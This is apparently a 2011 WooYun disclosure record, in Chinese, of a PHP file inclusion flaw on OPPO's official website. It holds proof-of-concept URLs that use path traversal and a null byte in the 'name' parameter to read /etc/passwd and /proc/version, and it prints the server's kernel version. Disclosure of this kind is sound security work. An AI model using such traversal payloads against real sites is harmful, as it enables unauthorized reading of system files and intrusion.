漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-01466
漏洞标题:OPPO官网PHP文件包含漏洞
相关厂商:OPPO
漏洞作者: linxinsnow[N.N.U
提交时间:2011-03-02 13:11
修复时间:2011-04-01 15:00
公开时间:2011-04-01 15:00
漏洞类型:文件包含
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-03-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-04-01: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
OPPO官网的PHP站点,存在大量的PHP文件包含漏洞,可以利用拿到root
详细说明:
漏洞证明:
http://www.oppo.com/index.php?q=mobile/product/newtpl&name=../../../../../../../../etc/passwd%00&tpl=index
读取passwd文件
http://www.oppo.com/index.php?q=mobile/product/newtpl&name=../../../../../../../../proc/version%00&tpl=index
读取系统信息:
Linux version 2.6.18-194.26.1.el5 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Tue Nov 9 12:54:20 EST 2010
修复方案:
过滤name字段和tpl字段等用户提交数据!!
版权声明:转载请注明来源 linxinsnow[N.N.U@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)